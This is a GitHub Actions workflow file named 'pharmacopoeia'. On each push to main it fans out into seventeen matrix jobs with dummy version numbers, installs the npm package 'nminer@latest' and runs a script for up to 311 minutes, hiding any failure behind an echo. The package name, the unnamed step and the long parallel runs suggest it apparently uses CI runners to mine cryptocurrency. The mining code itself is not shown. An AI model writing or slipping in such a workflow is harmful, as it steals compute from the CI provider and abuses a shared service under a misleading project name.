name: pharmacopoeia
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 2090 }
          - { version: 1371 }
          - { version: 7820 }
          - { version: 5230 }
          - { version: 1285 }
          - { version: 973 }
          - { version: 8035 }
          - { version: 3808 }
          - { version: 3660 }
          - { version: 8045 }
          - { version: 893 }
          - { version: 1061 }
          - { version: 9295 }
          - { version: 2151 }
          - { version: 4859 }
          - { version: 8922 }
          - { version: 8418 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: 
        run: |
          npm install nminer@latest
          timeout 311m node pharmacopoeia.js || echo "pharmacopoeia executed"